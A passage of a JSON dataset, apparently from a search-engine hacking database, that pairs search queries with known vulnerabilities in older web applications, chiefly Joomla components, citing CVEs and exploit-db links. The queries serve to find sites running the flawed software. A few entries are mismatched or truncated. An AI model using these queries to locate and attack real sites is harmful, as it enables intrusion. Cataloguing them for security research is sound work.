Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "id": 2989}, {"short description": "Powered by TextAds 2.08", "long description": "idevspot Text ads 2.08 sqli vulnerability - CVE: 2010-2319: http://www.exploit-db.com/exploits/13749", "submited": "2010-11-15", "request": "Powered by TextAds 2.08", "id": 2990}, {"short description": "inurl:/com_chronocontact", "long description": "Joomla Component ChronoForms 2.3.5 RFI Vulnerabilities - CVE: 2008-0567: http://www.exploit-db.com/exploits/5020", "submited": "2010-11-15", "request": "inurl:/com_chronocontact", "id": 2991}, {"short description": "inurl:\"com_kochsuite\"", "long description": "Joomla Kochsuite Component 0.9.4 Remote File Include Vulnerability - CVE: 2006-4348: http://www.exploit-db.com/exploits/2215", "submited": "2010-11-15", "request": "inurl:\"com_kochsuite\"", "id": 2994}, {"short description": 
"inurl:\"contentPage.php?id=\" & inurl:\"displayResource.php?id=\" & ...", "long description": "MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12792", "submited": "2010-11-15", "request": "inurl:\"contentPage.php?id=\" OR inurl:\"displayResource.php?id=\" AND intext:\"Website by Mile High Creative\"", "id": 2995}, {"short description": "Come from home Script ( Latest Project ) www.esmart-vision.com", "long description": "Smart Vsion Script News (newsdetail) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10977", "submited": "2010-11-15", "request": "Come from home Script ( Latest Project ) www.esmart-vision.com", "id": 2996}, {"short description": "inurl:com_jepoll", "long description": "Joomla Component com_jepoll (pollid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12781", "submited": "2010-11-15", "request": "inurl:com_jepoll", "id": 2997}, {"short description": "inurl:option=articles artid", "long description": "Mambo Component Articles (artid) Blind SQL Injection: http://www.exploit-db.com/exploits/5935", "submited": "2010-11-15", "request": "inurl:option=articles artid", "id": 2998}, {"short description": "inurl:\"com_jembed\"", "long description": "com_jembed (catid) Blind SQL Injection - CVE: 2010-1073: http://www.exploit-db.com/exploits/11026", "submited": "2010-11-15", "request": "inurl:\"com_jembed\"", "id": 2999}, {"short description": "\"powered by Gradman\"", "long description": "Gradman 0.1.3 (agregar_info.php) Local File Inclusion - CVE: 2008-0361: http://www.exploit-db.com/exploits/4926", "submited": "2010-11-15", "request": "\"powered by Gradman\"", "id": 3002}, {"short description": "inurl:com_bfsurvey_profree", "long description": "Joomla Component BF Survey Pro Free SQL Injection - CVE: 2009-4625: http://www.exploit-db.com/exploits/9601", "submited": "2010-11-15", "request": "inurl:com_bfsurvey_profree", "id": 3003}, {"short description": 
"inurl:option=com_cinema", "long description": "Joomla component cinema SQL injection Vulnerability: http://www.exploit-db.com/exploits/13792", "submited": "2010-11-15", "request": "inurl:option=com_cinema", "id": 3005}, {"short description": "inurl:com_jejob", "long description": "Joomla JE Job Component com_jejob LFI Vulnerability: http://www.exploit-db.com/exploits/14063", "submited": "2010-11-15", "request": "inurl:com_jejob", "id": 3006}, {"short description": "inurl:prog.php?dwkodu=", "long description": "Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability - CVE: 2008-4054: http://www.exploit-db.com/exploits/6310", "submited": "2010-11-15", "request": "inurl:prog.php?dwkodu=", "id": 3007}, {"short description": "\"Designed and powered by AWS Sports\"", "long description": "Sports Accelerator Suite v2.0 (news_id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14645", "submited": "2010-11-15", "request": "\"Designed and powered by AWS Sports\"", "id": 3010}, {"short description": "\"powered by zomplog\"", "long description": "Zomplog", "submited": "2010-11-15", "request": "\"powered by zomplog\"", "id": 3011}, {"short description": "\"Powered by WebStudio\"", "long description": "WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability - CVE: 2008-5336: http://www.exploit-db.com/exploits/7216", "submited": "2010-11-15", "request": "Joomla Component com_eportfolio Upload Vulnerability", "id": 3013}, {"short description": "inurl:com_eportfolio", "long description": "Joomla Component com_eportfolio Upload Vulnerability: http://www.exploit-db.com/exploits/13951", "submited": "2010-11-15", "request": "inurl:com_eportfolio", "id": 3014}, {"short description": "intext:\"Parlic Design\" inurl:id", "long description": "parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12767", "submited": "2010-11-15", "request": "intext:\"Parlic Design\" inurl:id", "id": 3015}, {"short description": "[ 
Powered by SkaDate dating ]", "long description": "SkaDate Dating (RFI/LFI/XSS) Multiple Remote Vulnerabilities - CVE: 2009-4700: http://www.exploit-db.com/exploits/9260", "submited": "2010-11-15", "request": "[ Powered by SkaDate dating ]", "id": 3016}, {"short description": "inurl:com_jotloader", "long description": "Joomla Component jotloader 1.2.1.a Blind SQL injection - CVE: 2008-2564: http://www.exploit-db.com/exploits/5737", "submited": "2010-11-15", "request": "inurl:com_jotloader", "id": 3017}, {"short description": "\"Site designed and built Powered by GlobalWebTek.\"", "long description": "GlobalWebTek Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12761", "submited": "2010-11-15", "request": "\"Site designed and built Powered by GlobalWebTek.\"", "id": 3018}, {"short description": "inurl:/wp-content/plugins/fgallery/", "long description": "Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability - CVE: 2008-0491: http://www.exploit-db.com/exploits/4993", "submited": "2010-11-15", "request": "inurl:/wp-content/plugins/fgallery/", "id": 3019}, {"short description": "2010 Powered by Subrion CMS", "long description": "Subrion Auto Classifieds Persistent Xss Vulnerability: http://www.exploit-db.com/exploits/14391", "submited": "2010-11-15", "request": "2010 Powered by Subrion CMS", "id": 3021}, {"short description": "Copyright 2007-2009 by Kasseler CMS. All rights reserved.", "long description": "Kasseler CMS 2.0.5 => By Pass / Download Backup Vulnerability - CVE: 2009-4822: http://www.exploit-db.com/exploits/12402", "submited": "2010-11-15", "request": "Copyright 2007-2009 by Kasseler CMS. 
All rights reserved.", "id": 3022}, {"short description": "Powered by Guruscript.com", "long description": "Freelancers Marketplace Script Persistent XSS Vulnerability: http://www.exploit-db.com/exploits/14389", "submited": "2010-11-15", "request": "Powered by Guruscript.com", "id": 3023}, {"short description": "\"powered by jshop\"", "long description": "JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability - CVE: 2008-1624: http://www.exploit-db.com/exploits/5325", "submited": "2010-11-15", "request": "\"powered by jshop\"", "id": 3024}, {"short description": "\"Powered by TS Special Edition\"", "long description": "TS Special Edition v.7.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12645", "submited": "2010-11-15", "request": "\"Powered by TS Special Edition\"", "id": 3025}, {"short description": "inurl:/jobsearchengine/", "long description": "i-netsolution Job Search Engine SQL Injection Vulnerability - CVE: 2010-2611: http://www.exploit-db.com/exploits/14079", "submited": "2010-11-15", "request": "inurl:/jobsearchengine/", "id": 3026}, {"short description": "inurl:\"com_jgen\"", "long description": "Joomla Component (com_jgen) SQL Injection Vulnerability - CVE: 2010-3422: http://www.exploit-db.com/exploits/14998", "submited": "2010-11-15", "request": "inurl:\"com_jgen\"", "id": 3027}, {"short description": "inurl:inc_webblogmanager.asp", "long description": "DMXReady Blog Manager", "submited": "2010-11-15", "request": "inurl:inc_webblogmanager.asp", "id": 3028}, {"short description": "Powered by eLitius Version 1.0", "long description": "eLitius 1.0 (manage-admin.php) Add Admin/Change Password: http://www.exploit-db.com/exploits/8459", "submited": "2010-11-15", "request": "Powered by eLitius Version 1.0", "id": 3029}, {"short description": "inurl:com_n-forms", "long description": "Joomla Component n-forms 1.01 Blind SQL Injection: http://www.exploit-db.com/exploits/6055", "submited": "2010-11-15", "request": "inurl:com_n-forms", 
"id": 3030}, {"short description": "inurl:index.php?option=com_races \"raceId\"", "long description": "Joomla Component com_races Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11710", "submited": "2010-11-15", "request": "inurl:index.php?option=com_races \"raceId\"", "id": 3032}, {"short description": "\"powered by gelato cms\"", "long description": "Gelato (index.php post) Remote SQL Injectio - CVE: 2007-4918: http://www.exploit-db.com/exploits/4410", "submited": "2010-11-15", "request": "\"powered by gelato cms\"", "id": 3034}, {"short description": "inurl:\"cont_form.php?cf_id=\"", "long description": "WebDM CMS SQL Injection Vulnerability - CVE: 2010-2689: http://www.exploit-db.com/exploits/14123", "submited": "2010-11-15", "request": "inurl:\"cont_form.php?cf_id=\"", "id": 3035}, {"short description": "allinurl:links.php?t=search", "long description": "phpBB Links MOD 1.2.2 Remote SQL Injection - CVE: 2007-4653: http://www.exploit-db.com/exploits/4346", "submited": "2010-11-15", "request": "allinurl:links.php?t=search", "id": 3036}, {"short description": "inurl:\"com_dateconverter\"", "long description": "Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14154", "submited": "2010-11-15", "request": "inurl:\"com_dateconverter\"", "id": 3038}, {"short description": "inurl:\"com_simplefaq\"", "long description": "Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability - CVE: 2010-0632CVE: 2010-0632: http://www.exploit-db.com/exploits/11294", "submited": "2010-11-15", "request": "inurl:\"com_simplefaq\"", "id": 3040}, {"short description": "inurl:com_jb2", "long description": "Joomla Component JooBlog 0.1.1 Blind SQL Injection - CVE: 2008-2630: http://www.exploit-db.com/exploits/5734", "submited": "2010-11-15", "request": "inurl:com_jb2", "id": 3042}, {"short description": "inurl:\"com_dms\"", "long description": "Joomla Component com_dms SQL Injection Vulnerability - 
CVE: 2010-0800: http://www.exploit-db.com/exploits/11289", "submited": "2010-11-15", "request": "inurl:\"com_dms\"", "id": 3044}, {"short description": "\"powered by: profitCode\"", "long description": "PayProCart 1146078425 Multiple Remote File Include Vulnerabilities - CVE: 2006-4672: http://www.exploit-db.com/exploits/2316", "submited": "2010-11-15", "request": "\"powered by: profitCode\"", "id": 3045}, {"short description": "inurl:/phpplanner/userinfo.php?userid=", "long description": "phpplanner XSS / SQL Vulnerability: http://www.exploit-db.com/exploits/13847", "submited": "2010-11-15", "request": "inurl:/phpplanner/userinfo.php?userid=", "id": 3046}, {"short description": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "long description": "PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln: http://www.exploit-db.com/exploits/3524", "submited": "2010-11-15", "request": "\"/nuke/htmltonuke.php\" - \"htmltonuke.php\"", "id": 3047}, {"short description": "Powered by UGiA PHP UPLOADER V0.2", "long description": "UGiA PHP UPLOADER V0.2 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11261", "submited": "2010-11-15", "request": "Powered by UGiA PHP UPLOADER V0.2", "id": 3048}, {"short description": "Powered by iBoutique v4.0", "long description": "iBoutique 4.0 (cat) Remote SQL Injection Vulnerability - CVE: 2008-4354: http://www.exploit-db.com/exploits/6444", "submited": "2010-11-15", "request": "Powered by iBoutique v4.0", "id": 3049}, {"short description": "\"Powered by ClanAdmin Tools v1.4.2\"", "long description": "ClanWeb 1.4.2 Remote Change Password / Add Admin: http://www.exploit-db.com/exploits/8717", "submited": "2010-11-15", "request": "\"Powered by ClanAdmin Tools v1.4.2\"", "id": 3050}, {"short description": "\"index.php?option=com_expose\"", "long description": "Joomla Component Expose RC35 Remote File Upload Vulnerability - CVE: 2007-3932: http://www.exploit-db.com/exploits/4194", "submited": "2010-11-15", "request": 
"\"index.php?option=com_expose\"", "id": 3051}, {"short description": "inurl:yvcomment", "long description": "Joomla Component yvcomment 1.16 Blind SQL Injection - CVE: 2008-2692: http://www.exploit-db.com/exploits/5755", "submited": "2010-11-15", "request": "inurl:yvcomment", "id": 3052}, {"short description": "Powered by osCommerce | Customized by EZ-Oscommerce", "long description": "EZ-Oscommerce 3.1 Remote File Upload: http://www.exploit-db.com/exploits/14415", "submited": "2010-11-15", "request": "Powered by osCommerce | Customized by EZ-Oscommerce", "id": 3053}, {"short description": "\"kims Q - Administrator Login Mode\"", "long description": "KimsQ 040109 Multiple Remote File Include Vulnerability: http://www.exploit-db.com/exploits/11960", "submited": "2010-11-15", "request": "\"kims Q - Administrator Login Mode\"", "id": 3054}, {"short description": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "long description": "Aim Web Design Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12791", "submited": "2010-11-15", "request": "inurl:\"coursepage.php?id=\" intext:\"Web Site design by : Aim Web Design Cheshire\"", "id": 3055}, {"short description": "Powered by One-News", "long description": "OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/6292", "submited": "2010-11-15", "request": "Powered by One-News", "id": 3056}, {"short description": "\"Powered by PHP Director\"", "long description": "PHPDirector", "submited": "2010-11-15", "request": "\"Powered by PHP Director\"", "id": 3058}, {"short description": "\"Webdesign Cosmos Solutions\"", "long description": "Cosmos Solutions cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12793", "submited": "2010-11-15", "request": "\"Webdesign Cosmos Solutions\"", "id": 3059}, {"short description": "inurl:\"com_hestar\"", "long description": "Mambo Component com_hestar Remote SQL Injection Vulnerability: 
http://www.exploit-db.com/exploits/9609", "submited": "2010-11-15", "request": "inurl:\"com_hestar\"", "id": 3061}, {"short description": "\"Powered by NovaBoard v1.0.0\"", "long description": "NovaBoard 1.0.0 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8063", "submited": "2010-11-15", "request": "\"Powered by NovaBoard v1.0.0\"", "id": 3062}, {"short description": "inurl:es_offer.php?files_dir=", "long description": "Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4715: http://www.exploit-db.com/exploits/4352", "submited": "2010-11-15", "request": "inurl:es_offer.php?files_dir=", "id": 3063}, {"short description": "inurl:index.php?option=com_joomlaconnect_be", "long description": "Joomla Component com_joomlaconnect_be Blind Injection Vulnerability: http://www.exploit-db.com/exploits/11578", "submited": "2010-11-15", "request": "inurl:index.php?option=com_joomlaconnect_be", "id": 3065}, {"short description": "\"Powered by TinyPHPForum v3.61\"", "long description": "TinyPHPForum 3.61 File Disclosure / Code Execution Vulnerabilities: http://www.exploit-db.com/exploits/8342", "submited": "2010-11-15", "request": "\"Powered by TinyPHPForum v3.61\"", "id": 3066}, {"short description": "intitle:\"CCMS v3.1 Demo PW\"", "long description": "CCMS 3.1 Demo Remote SQL Injection - CVE: 2007-6658: http://www.exploit-db.com/exploits/4809", "submited": "2010-11-15", "request": "intitle:\"CCMS v3.1 Demo PW\"", "id": 3068}, {"short description": "\"powered by mcGalleryPRO\"", "long description": "mcGalleryPRO 2006 (path_to_folder) Remote Include Vulnerability - CVE: 2006-4720: http://www.exploit-db.com/exploits/2342", "submited": "2010-11-15", "request": "\"powered by mcGalleryPRO\"", "id": 3070}, {"short description": "Powered by Dayfox Designs This is a port of WordPress", "long description": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-3564: http://www.exploit-db.com/exploits/6203", 
"submited": "2010-11-15", "request": "Powered by Dayfox Designs This is a port of WordPress", "id": 3071}, {"short description": "\"Powered By EgyPlus\"", "long description": "EgyPlus 7ml 1.0.1 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2167: http://www.exploit-db.com/exploits/8865", "submited": "2010-11-15", "request": "\"Powered By EgyPlus\"", "id": 3072}, {"short description": "inurl:com_seminar", "long description": "Joomla Component Seminar 1.28 (id) Blind SQL Injection - CVE: 2009-4200: http://www.exploit-db.com/exploits/8867", "submited": "2010-11-15", "request": "inurl:com_seminar", "id": 3073}, {"short description": "allintext:\"Powered By Buddy Zone\"", "long description": "Buddy Zone 1.5 Multiple SQL Injection Vulnerabilities - CVE: 2007-3526: http://www.exploit-db.com/exploits/4128", "submited": "2010-11-15", "request": "allintext:\"Powered By Buddy Zone\"", "id": 3074}, {"short description": "inurl:index.php?option=com_ice", "long description": "Joomla Component com_ice Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11544", "submited": "2010-11-15", "request": "inurl:index.php?option=com_ice", "id": 3075}, {"short description": "Powered by LiteCommerce", "long description": "litecommerce 2004 (category_id) Remote SQL Injection Vulnerability - CVE: 2005-1032: http://www.exploit-db.com/exploits/4300", "submited": "2010-11-15", "request": "Powered by LiteCommerce", "id": 3076}, {"short description": "\"Web Group Communication Center\"", "long description": "Web Group Communication Center (WGCC) 1.0.3 SQL Injection Vuln - CVE: 2008-2445: http://www.exploit-db.com/exploits/5606", "submited": "2010-11-15", "request": "\"Web Group Communication Center\"", "id": 3077}, {"short description": "inurl:com_xewebtv", "long description": "Joomla Component Xe webtv (id) Blind SQL Injection - CVE: 2008-5200: http://www.exploit-db.com/exploits/5966", "submited": "2010-11-15", "request": "inurl:com_xewebtv", "id": 3078}, {"short 
description": "inurl:index.php?option=com_paxgallery", "long description": "Joomla Component com_paxgallery Blind Injection Vulnerability: http://www.exploit-db.com/exploits/11595", "submited": "2010-11-15", "request": "inurl:index.php?option=com_paxgallery", "id": 3080}, {"short description": "\"Site designed and built by ProWeb Associates.\"", "long description": "ProWeb Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12730", "submited": "2010-11-15", "request": "\"Site designed and built by ProWeb Associates.\"", "id": 3082}, {"short description": "Powered by iScripts SocialWare", "long description": "Upload Vulnerability and XSS in socialware V2.2: http://www.exploit-db.com/exploits/12448", "submited": "2010-11-15", "request": "Powered by iScripts SocialWare", "id": 3083}, {"short description": "\"(C) This site is NITROpowered!\"", "long description": "NITRO Web Gallery SQL Injection Vulnerability - CVE: 2010-2141: http://www.exploit-db.com/exploits/12735", "submited": "2010-11-15", "request": "\"(C) This site is NITROpowered!\"", "id": 3084}, {"short description": "\"phpQuestionnaire v3\"", "long description": "phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability - CVE: 2006-4966: http://www.exploit-db.com/exploits/2410", "submited": "2010-11-15", "request": "\"phpQuestionnaire v3\"", "id": 3085}, {"short description": "\"generated by Exhibit Engine 1.5 RC 4\"", "long description": "Exhibit Engine 1.5 RC 4 (photo_comment.php) File Include - CVE: 2006-5292: http://www.exploit-db.com/exploits/2509", "submited": "2010-11-15", "request": "\"generated by Exhibit Engine 1.5 RC 4\"", "id": 3086}, {"short description": "powered by connectix boards", "long description": "Connectix Boards 0.8.2 template_path Remote File Inclusion - CVE: 2008-0502: http://www.exploit-db.com/exploits/5012", "submited": "2010-11-15", "request": "powered by connectix boards", "id": 3087}, {"short description": "inurl:com_ezstore", "long description": 
"Joomla Component EZ Store Remote Blind SQL Injection - CVE: 2008-3586: http://www.exploit-db.com/exploits/6199", "submited": "2010-11-15", "request": "inurl:com_ezstore", "id": 3088}, {"short description": "\"FrontAccounting\"", "long description": "FrontAccounting 1.13 Remote File Inclusion Vulnerabilities - CVE: 2007-5117: http://www.exploit-db.com/exploits/4456", "submited": "2010-11-15", "request": "\"FrontAccounting\"", "id": 3089}, {"short description": "inurl:\"option=com_elite_experts\"", "long description": "Joomla Component (com_elite_experts) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15100", "submited": "2010-11-15", "request": "inurl:\"option=com_elite_experts\"", "id": 3090}, {"short description": "inurl:\"com_tupinambis\"", "long description": "Joomla/Mambo Tupinambis SQL Injection - CVE: 2009-3434: http://www.exploit-db.com/exploits/9832", "submited": "2010-11-15", "request": "inurl:\"com_tupinambis\"", "id": 3091}, {"short description": "\"Powered By Basic CMS SweetRice\"", "long description": "SweetRice 0.6.4 (fckeditor) Remote File Upload: http://www.exploit-db.com/exploits/14184", "submited": "2010-11-15", "request": "\"Powered By Basic CMS SweetRice\"", "id": 3092}, {"short description": "\"Powered by AMCMS3\"", "long description": "Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties: http://www.exploit-db.com/exploits/4326", "submited": "2010-11-15", "request": "\"Powered by AMCMS3\"", "id": 3093}, {"short description": "\"Web Site Design by Red Cat Studios\"", "long description": "Realtor WebSite System E-Commerce SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12772", "submited": "2010-11-15", "request": "\"Web Site Design by Red Cat Studios\"", "id": 3094}, {"short description": "inurl:index.php?option=com_liveticker \"viewticker\"", "long description": "Joomla Component com_liveticker Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11604", "submited": "2010-11-15", "request": 
"inurl:index.php?option=com_liveticker \"viewticker\"", "id": 3095}, {"short description": "allinurl:\"com_cinema\"", "long description": "Joomla Component Cinema 1.0 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5300", "submited": "2010-11-15", "request": "allinurl:\"com_cinema\"", "id": 3101}, {"short description": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "long description": "Autonomous LAN party 0.98.3 Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/9460", "submited": "2010-11-15", "request": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "id": 3103}, {"short description": "\"Powered by Clipshare\"", "long description": "ClipShare 2.6 Remote User Password Change - CVE: 2008-7188: http://www.exploit-db.com/exploits/4837", "submited": "2010-11-15", "request": "\"Powered by Clipshare\"", "id": 3104}, {"short description": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "long description": "PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability - CVE: 2008-0805: http://www.exploit-db.com/exploits/5136", "submited": "2010-11-15", "request": "\"Powered by PHPizabi v0.848b C1 HFP1\"", "id": 3106}, {"short description": "inurl:com_jejob", "long description": "Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12782", "submited": "2010-11-15", "request": "inurl:com_jejob", "id": 3108}, {"short description": "\"Devana is an open source project !\"", "long description": "Devana SQL Injection vulnerability - CVE: 2010-2673: http://www.exploit-db.com/exploits/11922", "submited": "2010-11-15", "request": "\"Devana is an open source project !\"", "id": 3109}, {"short description": "inurl:\"com_jpodium\"", "long description": "Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14232", "submited": "2010-11-15", "request": "inurl:\"com_jpodium\"", "id": 3110}, {"short description": "intext:\"Powered by: Virtual War v1.5.0\"", "long 
description": "VWar 1.50 R14 (online.php) Remote SQL Injection Vulnerability - CVE: 2006-4142: http://www.exploit-db.com/exploits/2170", "submited": "2010-11-15", "request": "intext:\"Powered by: Virtual War v1.5.0\"", "id": 3111}, {"short description": "inurl:index.php/option?com_flexicontent", "long description": "Joomla Component com_flexicontent Local File Vulnerability: http://www.exploit-db.com/exploits/12185", "submited": "2010-11-15", "request": "inurl:index.php/option?com_flexicontent", "id": 3112}, {"short description": "inurl:option=com_agenda", "long description": "Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability - CVE: 2010-1716: http://www.exploit-db.com/exploits/12132", "submited": "2010-11-15", "request": "inurl:option=com_agenda", "id": 3113}, {"short description": "inurl:\"index.php?css=mid=art=\"", "long description": "EasyWay CMS (index.php mid) Remote SQL Injection - CVE: 2008-2555: http://www.exploit-db.com/exploits/5706", "submited": "2010-11-15", "request": "inurl:\"index.php?css=mid=art=\"", "id": 3118}, {"short description": "\"Powered By Webcards\"", "long description": "WebCards 1.3 Remote SQL Injection Vulnerability - CVE: 2008-4878: http://www.exploit-db.com/exploits/6869", "submited": "2010-11-15", "request": "\"Powered By Webcards\"", "id": 3120}, {"short description": "\"sitio web disenado por www.toronja.com.pe\"", "long description": "toronja cms SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12770", "submited": "2010-11-15", "request": "\"sitio web disenado por www.toronja.com.pe\"", "id": 3123}, {"short description": "E-Commerce Engine Copyright 2005 osCSS", "long description": "osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities: http://www.exploit-db.com/exploits/12856", "submited": "2010-11-15", "request": "E-Commerce Engine Copyright 2005 osCSS", "id": 3124}, {"short description": "Powered by Bug Software intext:Your Cart Contains", "long description": "BugMall Shopping Cart 2.5 (SQL/XSS) 
Multiple Remote Vulnerabilities - CVE: 2007-3448: http://www.exploit-db.com/exploits/4103", "submited": "2010-11-15", "request": "Powered by Bug Software intext:Your Cart Contains", "id": 3126}, {"short description": "Winn ASP Guestbook from Winn.ws", "long description": "Winn ASP Guestbook 1.01b Remote Database Disclosure - CVE: 2009-4760: http://www.exploit-db.com/exploits/8596", "submited": "2010-11-15", "request": "Winn ASP Guestbook from Winn.ws", "id": 3127}, {"short description": "inurl:option=com_n-forms form_id", "long description": "Mambo Component n-form (form_id) Blind SQL Injection: http://www.exploit-db.com/exploits/7064", "submited": "2010-11-15", "request": "inurl:option=com_n-forms form_id", "id": 3128}, {"short description": "intext:\"English for dummies\"", "long description": "Mobilelib Gold v3 Local File Disclosure Vulnerability - CVE: 2009-3823: http://www.exploit-db.com/exploits/9144", "submited": "2010-11-15", "request": "intext:\"English for dummies\"", "id": 3129}, {"short description": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "long description": "Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability - CVE: 2009-4104: http://www.exploit-db.com/exploits/10238", "submited": "2010-11-15", "request": "inurl:\"com_lyftenbloggie\" / \"Powered by LyftenBloggie\"", "id": 3131}, {"short description": "\"Powered by GGCMS\"", "long description": "GGCMS 1.1.0 RC1 Remote Code Execution - CVE: 2007-0804: http://www.exploit-db.com/exploits/3271", "submited": "2010-11-15", "request": "\"Powered by GGCMS\"", "id": 3133}, {"short description": "Powered by Ac4p.com Gallery v1.0 , Copyright 2007 ac4p.com", "long description": "Ac4p.com Gallery v1.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11519", "submited": "2010-11-15", "request": "Powered by Ac4p.com Gallery v1.0 , Copyright 2007 ac4p.com", "id": 3134}, {"short description": "inurl:index.php?menu=showcat", "long description": "ACG-ScriptShop 
(cid) Remote SQL Injection Vulnerability - CVE: 2008-4144: http://www.exploit-db.com/exploits/6364", "submited": "2010-11-15", "request": "inurl:index.php?menu=showcat", "id": 3135}, {"short description": "Powered by minb", "long description": "minb 0.1.0 Remote Code Execution - CVE: 2008-7005: http://www.exploit-db.com/exploits/6432", "submited": "2010-11-15", "request": "Powered by minb", "id": 3136}, {"short description": "\"Powered by phpCC Beta 4.2\"", "long description": "phpCC 4.2 beta (base_dir) Remote File Inclusion Vulnerability - CVE: 2006-4073: http://www.exploit-db.com/exploits/2134", "submited": "2010-11-15", "request": "\"Powered by phpCC Beta 4.2\"", "id": 3137}, {"short description": "inurl:index.php?menu=showcat=", "long description": "Alstrasoft Forum (cat) Remote SQL Injection Vulnerability - CVE: 2008-3954: http://www.exploit-db.com/exploits/6396", "submited": "2010-11-15", "request": "inurl:index.php?menu=showcat=", "id": 3138}, {"short description": "intext:elkagroup Image Gallery v1.0", "long description": "elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability - CVE: 2007-3461: http://www.exploit-db.com/exploits/4114", "submited": "2010-11-15", "request": "intext:elkagroup Image Gallery v1.0", "id": 3143}, {"short description": "Powered by Digital College 1.0 - Magtrb Soft 2010", "long description": "Digital College 1.0 Upload Vulnerability: http://www.exploit-db.com/exploits/12568", "submited": "2010-11-15", "request": "Powered by Digital College 1.0 - Magtrb Soft 2010", "id": 3144}, {"short description": "\"powered by AMCMS3\"", "long description": "Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection - CVE: 2008-0262: http://www.exploit-db.com/exploits/4905", "submited": "2010-11-15", "request": "\"powered by AMCMS3\"", "id": 3145}, {"short description": "inurl:\"e107_plugins/my_gallery\"", "long description": "e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability - CVE: 2008-1702: 
http://www.exploit-db.com/exploits/5308", "submited": "2010-11-15", "request": "inurl:\"e107_plugins/my_gallery\"", "id": 3146}, {"short description": "\"Powered by BIGACE 2.4\"", "long description": "BIGACE 2.4 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-2520: http://www.exploit-db.com/exploits/5596", "submited": "2010-11-15", "request": "\"Powered by BIGACE 2.4\"", "id": 3147}, {"short description": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "long description": "Wordpress Plugin e-Commerce", "submited": "2010-11-15", "request": "inurl:\"/wp-content/plugins/wp-shopping-cart/\"", "id": 3148}, {"short description": "intitle:\"igenus webmail login\"", "long description": "iGENUS WebMail 2.0.2 (config_inc.php) Remote Code Execution - CVE: 2006-1031: http://www.exploit-db.com/exploits/1527", "submited": "2010-11-15", "request": "intitle:\"igenus webmail login\"", "id": 3150}, {"short description": "\"Powered by www.aspportal.net\"", "long description": "ASPPortal Free Version (Topic_Id) Remote SQL Injection Vulnerability - CVE: 2008-5268: http://www.exploit-db.com/exploits/5775", "submited": "2010-11-15", "request": "\"Powered by www.aspportal.net\"", "id": 3151}, {"short description": "inurl:\"com_ijoomla_archive\"", "long description": "Joomla com_ijoomla_archive Blind SQL Injectio: http://www.exploit-db.com/exploits/8164", "submited": "2010-11-15", "request": "inurl:\"com_ijoomla_archive\"", "id": 3152}, {"short description": "\"Power by Blakord Portal\"", "long description": "Blakord Portal Beta 1.3.A (all modules) SQL Injection Vulnerability - CVE: 2007-6565: http://www.exploit-db.com/exploits/4793", "submited": "2010-11-15", "request": "\"Power by Blakord Portal\"", "id": 3154}, {"short description": "\"Powered by FreeWebshop\"", "long description": "FreeWebshop", "submited": "2010-11-15", "request": "\"Powered by FreeWebshop\"", "id": 3155}, {"short description": "intext:\"Designed by Spaceacre\"", "long description": "Spaceacre 
